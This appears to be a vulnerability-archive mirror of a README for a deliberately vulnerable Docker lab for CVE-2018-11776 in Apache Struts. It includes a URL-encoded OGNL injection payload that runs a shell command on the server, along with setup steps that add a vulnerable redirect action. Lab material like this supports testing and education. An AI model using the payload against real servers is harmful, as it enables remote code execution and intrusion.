关联漏洞
标题:
Apache Struts 输入验证错误漏洞
(CVE-2018-11776)
描述:Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。Apache Struts 2是Apache Struts的下一代产品,是在Struts 1和WebWork的技术基础上进行了合并的全新Struts 2框架,其体系结构与Struts 1差别较大。 Apache Struts 2.3版本至2.3.34版本和2.5版本至2.5.16版本中存在输入验证漏洞
描述
Vulnerable docker container for CVE-2018-11776
介绍
## Vulnerable docker container for CVE-2018-11776
# docker pull bhdresh/cve-2018-11776:1.0
# docker run -dit -p <IP ADDRESS>:8080:8080 bhdresh/cve-2018-11776:1.0
### PoC
##### PoC - 1
Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/${333+333}/help.action
Result : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/666/help.action
##### PoC - 2
Request : http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27touch /tmp/vulnerable%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/help.action
Result : This would create a file named 'vulnerable' in /tmp/ directory of docker
## Steps to create vulnerable docker container
##### Create a Dockerfile
FROM ubuntu:latest
RUN apt-get update -y
RUN apt-get upgrade -y
RUN apt-get dist-upgrade -y
RUN apt-get install default-jdk vim net-tools wget -y
EXPOSE 8080
##### Build a docker
# docker build -t cve-2018-11776 .
##### Start a docker
# docker run --name cve-2018-11776 -p <IP ADDRESS>:8080:8080 -dit cve-2018-11776 /bin/bash
##### Login to docker
# docker exec -it cve-2018-11776 /bin/bash
##### Make followinng changes inside docker
###### Set up Tomcat:
# mkdir ~/sources
# cd ~/sources
# wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz
# tar xvzf apache-tomcat-7.0.90.tar.gz
# mv apache-tomcat-7.0.90 /opt/tomcat
###### Update bashrc with variables:
# vim ~/.bashrc
export JAVA_HOME=/usr/lib/jvm/default-java
export CATALINA_HOME=/opt/tomcat
# . ~/.bashrc
###### Add an admin to the Tomact gui:
# vim /opt/tomcat/conf/tomcat-users.xml
<user username="username" password="test-cve-2018-11776" roles="manager-gui,admin-gui" />
###### Start Tomcat server
# $CATALINA_HOME/bin/startup.sh
###### Upload and deploy a vulnerable Struts2 Showcase through tomcat UI
http://<IP ADDRESS>:8080 (username:test-cve-2018-11776)
###### Restart Tomcat
# $CATALINA_HOME/bin/shutdown.sh
# $CATALINA_HOME/bin/startup.sh
###### Add a vulnerable redirection action without a namespace:
# vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml
<action name="help">
<result type="redirectAction">
<param name="actionName">date.action</param>
</result>
</action>
NOTE: By default, alwaysSelectFullNamespace should be set to True.
###### Restart Tomcat and check out the Struts2 Showcase page:
# $CATALINA_HOME/bin/shutdown.sh
# $CATALINA_HOME/bin/startup.sh
http://<IP ADDRESS>:8080/struts2-showcase-2.3.14/showcase.jsp
### Author
@bhdresh
### References
https://github.com/xfox64x/CVE-2018-11776
https://github.com/jas502n/St2-057
文件快照
[4.0K] /data/pocs/09e268759acea479b944a89d5181615dc7b62c0e
└── [3.2K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。